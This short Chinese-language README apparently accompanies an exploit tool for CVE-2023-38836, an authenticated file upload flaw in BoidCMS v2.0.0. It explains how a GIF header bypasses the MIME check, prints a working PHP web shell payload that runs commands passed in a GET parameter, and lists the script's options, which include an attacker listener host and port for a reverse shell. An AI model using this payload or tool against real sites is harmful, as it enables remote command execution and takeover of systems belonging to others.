BoidCMS v2.0.0 中存在文件上传漏洞,允许已认证的攻击者上传危险类型文件 (CWE-434)。
要利用此漏洞,攻击者可以添加 GIF 文件头以绕过 MIME 类型检查。
GIF89a;
<?php system($_GET["cmd"]); ?>
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]
CVE-2023-38836 漏洞利用工具
options:
-h, --help 显示此帮助信息并退出
-u URL, --url URL 网站 URL
-U USER, --user USER 管理员用户名
-P PASSWD, --passwd PASSWD
管理员密码
-l LHOST, --lhost LHOST
监听主机
-p LPORT, --lport LPORT
监听端口
